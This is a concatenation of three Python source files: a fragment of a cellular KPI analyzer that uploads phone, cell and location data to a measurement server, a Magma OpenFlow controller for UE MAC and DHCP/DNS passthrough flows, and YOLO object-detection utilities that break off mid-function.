def __upload_kpi_async(self,kpi_name, kpi_value, cur_location):
"""
Upload the KPI value to the cloud
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param kpi_value: The value of KPI
:type kpi_value: string
"""
self.log_debug("uploading kpi: "+kpi_name)
if is_android:
phone_info = self.__get_phone_model()
operator_info = self.__get_operator_info()
# cur_location = self.__get_current_gps()
cell_id = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_id()
cell_id = cell_id if cell_id else "None"
tac = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_cell_tac()
tac = tac if tac else "None"
downlink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_frequency()
downlink_frequency = downlink_frequency if downlink_frequency else ""
uplink_frequency = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_frequency()
uplink_frequency = uplink_frequency if uplink_frequency else ""
downlink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_downlink_bandwidth()
downlink_bandwidth = downlink_bandwidth if downlink_bandwidth else ""
uplink_bandwidth = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_uplink_bandwidth()
uplink_bandwidth = uplink_bandwidth if uplink_bandwidth else ""
allowed_access = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_allowed_access()
allowed_access = allowed_access if allowed_access else ""
band_indicator = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_band_indicator()
band_indicator = band_indicator if band_indicator else ""
#FIXME: How to handle the missing GPS location?
if not cur_location:
cur_location = "None"
for item in kpi_value:
if not kpi_value[item]:
kpi_value[item] = "None"
httpClient = None
try:
postdata = {'Phone_model': phone_info,
'operator': operator_info,
'GPS': str(cur_location[0])+"|"+str(cur_location[1]),
'Time': time.time(),
'Cell_ID': str(cell_id),
'TAI_ID' : str(tac),
'DL_Freq': str(downlink_frequency),
'UL_Freq': str(uplink_frequency),
'DL_Bandwidth': str(downlink_bandwidth),
'UL_Bandwidth': str(uplink_bandwidth),
'Allowed_access': str(allowed_access),
'Band indicator': str(band_indicator),
'KPI_type' : kpi_name,
'KPI_val': kpi_value,
}
# url = 'http://34.213.149.155/postdata/'
url = 'http://knowledge-map.xyz/postdata/'
# self.log_debug(str(postdata))
jdata = json.dumps(postdata)
req = urllib.request.Request(url, jdata)
response = urllib.request.urlopen(req)
self.log_debug("New KPI uploaded:" + kpi_name)
if httpClient:
httpClient.close()
return True
except Exception as e:
# import traceback
# self.log_error(str(traceback.format_exc()))
self.log_warning("Fail to upload the KPI: "+ kpi_name)
if httpClient:
httpClient.close()
return False
else:
self.log_info("New KPI (uploading skipped): "+kpi_name)
return True
def upload_kpi(self,kpi_name, kpi_value):
"""
Upload the KPI value to the cloud
:param kpi_name: The KPI to be queried
:type kpi_name: string
:param kpi_value: The value of KPI
:type kpi_value: string
"""
# self.log_info("New KPI: " + kpi_name)
cur_location = self.__get_current_gps()
KpiAnalyzer.pending_upload_task.append((kpi_name,kpi_value,cur_location))
def __get_phone_model(self):
if is_android:
#TODO: Optimization, avoid repetitive calls
res = mi2app_utils.get_phone_manufacturer()+"-"+mi2app_utils.get_phone_model()
# self.log_debug("Phone model: "+res)
return res
else:
return self.__phone_model
def __get_operator_info(self):
if is_android:
#TODO: Optimization, avoid repetitive calls
return mi2app_utils.get_operator_info()
else:
self.__op = self.get_analyzer('TrackCellInfoAnalyzer').get_cur_op()
return self.__op
def __get_current_gps(self):
if is_android:
location = mi2app_utils.get_current_location()
# self.log_debug("Current location: "+str(location))
return location
else:
return ""
def set_phone_model(self, phone_model):
"""
Set phone model
:param phone_model: string
:return:
"""
self.__phone_model = phone_model
def set_operator(self, operator):
"""
Set operator
:param operator: string
:return:
"""
self.__op = operator
|
ue_mac.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
from typing import List
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import packet
from ryu.lib.packet import ether_types, dhcp
from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
from lte.protos.pipelined_pb2 import FlowResponse, SetupFlowsResult, \
UEMacFlowRequest
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import encode_imsi, decode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
class UEMacAddressController(MagmaController):
"""
UE MAC Address Controller
This controller controls table 0 which is the first table every packet
touches. It matches on UE MAC address and sets IMSI metadata
"""
APP_NAME = "ue_mac"
APP_TYPE = ControllerType.SPECIAL
def __init__(self, *args, **kwargs):
super(UEMacAddressController, self).__init__(*args, **kwargs)
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_table_num(INGRESS)
self.arpd_controller_fut = kwargs['app_futures']['arpd']
self.arp_contoller = None
self._datapath = None
tbls = self._service_manager.allocate_scratch_tables(self.APP_NAME, 2)
self._passthrough_set_tbl = tbls[0]
self._dhcp_learn_scratch = tbls[1]
self._li_port = None
self._imsi_set_tbl_num = \
self._service_manager.INTERNAL_IMSI_SET_TABLE_NUM
self._ipfix_sample_tbl_num = \
self._service_manager.INTERNAL_IPFIX_SAMPLE_TABLE_NUM
self._app_set_tbl_num = self._service_manager.INTERNAL_APP_SET_TABLE_NUM
if 'li_local_iface' in kwargs['config']:
self._li_port = \
BridgeTools.get_ofport(kwargs['config']['li_local_iface'])
self._dpi_port = \
BridgeTools.get_ofport(kwargs['config']['dpi']['mon_port'])
def initialize_on_connect(self, datapath):
self.delete_all_flows(datapath)
self._datapath = datapath
self._install_default_flows()
def cleanup_on_disconnect(self, datapath):
self.delete_all_flows(datapath)
def handle_restart(self, ue_requests: List[UEMacFlowRequest]
) -> SetupFlowsResult:
"""
Setup current check quota flows.
"""
# TODO Potentially we can run a diff logic but I don't think there is
# benefit(we don't need stats here)
self.delete_all_flows(self._datapath)
self._install_default_flows()
for ue_req in ue_requests:
self.add_ue_mac_flow(ue_req.sid.id, ue_req.mac_addr)
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.handle_restart(ue_requests)
self.init_finished = True
return SetupFlowsResult(result=SetupFlowsResult.SUCCESS)
def delete_all_flows(self, datapath):
flows.delete_all_flows_from_table(datapath, self.tbl_num)
flows.delete_all_flows_from_table(datapath, self._passthrough_set_tbl)
flows.delete_all_flows_from_table(datapath, self._dhcp_learn_scratch)
flows.delete_all_flows_from_table(datapath, self._imsi_set_tbl_num)
def add_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return FlowResponse(result=FlowResponse.FAILURE)
uplink_match = MagmaMatch(eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
# For handling internal ipfix pkt sampling
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
return FlowResponse(result=FlowResponse.SUCCESS)
def delete_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return
uplink_match = MagmaMatch(eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._delete_resubmit_flow(sid, uplink_match,
tbl_num=self._imsi_set_tbl_num)
self._delete_resubmit_flow(sid, downlink_match,
tbl_num=self._imsi_set_tbl_num)
def add_arp_response_flow(self, imsi, yiaddr, chaddr):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.add_ue_arp_flows(self._datapath,
yiaddr, chaddr)
self.logger.debug("From DHCP learn: IMSI %s, has ip %s and mac %s",
imsi, yiaddr, chaddr)
# Associate IMSI to IPv4 addr in directory service
threading.Thread(target=update_record, args=(str(imsi),
yiaddr)).start()
else:
self.logger.error("ARPD controller not ready, ARP learn FAILED")
def _add_resubmit_flow(self, sid, match, action=None,
priority=flows.DEFAULT_PRIORITY,
next_table=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if next_table is None:
next_table = self.next_table
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
if sid:
actions.append(parser.NXActionRegLoad2(dst=IMSI_REG,
value=encode_imsi(sid)))
flows.add_resubmit_next_service_flow(self._datapath, tbl_num,
match, actions=actions,
priority=priority,
resubmit_table=next_table)
def _delete_resubmit_flow(self, sid, match, action=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.delete_flow(self._datapath, tbl_num, match, actions=actions)
def _add_dns_passthrough_flows(self):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement and send to egress
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53)
self._add_resubmit_flow(None, ulink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53)
self._add_resubmit_flow(None, dlink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS over tls
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=853)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=853)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
def _add_dhcp_passthrough_flows(self):
ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67)
self._add_resubmit_flow(None, uplink_match, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68)
# Set so triggers packetin and we can learn the ip to do arp response
self._add_resubmit_flow(None, downlink_match, action,
flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch,
tbl_num=self._passthrough_set_tbl)
# Install default flow for dhcp learn scratch
flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
match=MagmaMatch(), actions=[],
priority=flows.PASSTHROUGH_PRIORITY,
output_port=ofproto.OFPP_CONTROLLER,
copy_table=self.next_table,
max_len=ofproto.OFPCML_NO_BUFFER)
def _add_uplink_arp_allow_flow(self):
arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
arp_match, actions=[],
priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _learn_arp_entry(self, ev):
"""
Learn action to process PacketIn DHCP packets, dhcp ack packets will
be used to learn the ARP entry for the UE to install rules in the arp
table. The DHCP packets will then be sent thorugh the pipeline.
"""
msg = ev.msg
if self._dhcp_learn_scratch != msg.table_id:
# Intended for other application
return
try:
encoded_imsi = _get_encoded_imsi_from_packetin(msg)
# Decode the imsi to properly save in directoryd
imsi = decode_imsi(encoded_imsi)
except MagmaOFError as e:
# No packet direction, but intended for this table
self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
return
pkt = packet.Packet(msg.data)
dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
# DHCP yiaddr is the client(UE) ip addr
# chaddr is the client mac address
self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)
def _install_default_flows(self):
"""
Install default flows
"""
# Allows arp packets from uplink(no eth dst set) to go to the arp table
self._add_uplink_arp_allow_flow()
self._add_dhcp_passthrough_flows()
self._add_dns_passthrough_flows()
self._add_resubmit_flow(None, MagmaMatch(),
priority=flows.MINIMUM_PRIORITY,
tbl_num=self._passthrough_set_tbl)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(None, MagmaMatch(in_port=self._dpi_port),
priority=flows.PASSTHROUGH_PRIORITY,
next_table=self._app_set_tbl_num)
if self._li_port:
match = MagmaMatch(in_port=self._li_port)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
match, actions=[], priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
# TODO We might want a default drop all rule with min priority, but
# adding it breakes all unit tests for this controller(needs work)
def _get_encoded_imsi_from_packetin(msg):
"""
Retrieve encoded imsi from the Packet-In message, or raise an exception if
it doesn't exist.
"""
imsi = msg.match.get(IMSI_REG)
if imsi is None:
raise MagmaOFError('IMSI not found in OFPMatch')
return imsi
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
from tools.Detection_to_XML import CreateXMLfile
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights(YOLO_CUSTOM_WEIGHTS) # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
label = "{}".format(NUM_CLASS[class_ind]) + score_str
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
# Process 2: Select the bounding box with the highest score according to socre order A
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Process 3: Calculate this bounding box A and
# Remain all iou of the bounding box and remove those bounding boxes whose iou value is higher than the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
# To close the window after the required kill value was provided
cv2.destroyAllWindows()
return image
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.list_physical_devices('GPU')")
Yolo = Load_Yolo_model()
times = []
SUM = 0
is_first_detection = True
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
Processing_times.put(time.time())
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
#print("Do prediction")
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
#print("OK")
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
SUM += (t2-t1)
if is_first_detection == True:
SUM = 0
is_first_detection = False
print("prediction started")
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
if Frames_data.qsize()==0 and SUM != 0:
#time.sleep(0.1)
print(SUM)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
started = False
while True:
ret, img = vid.read()
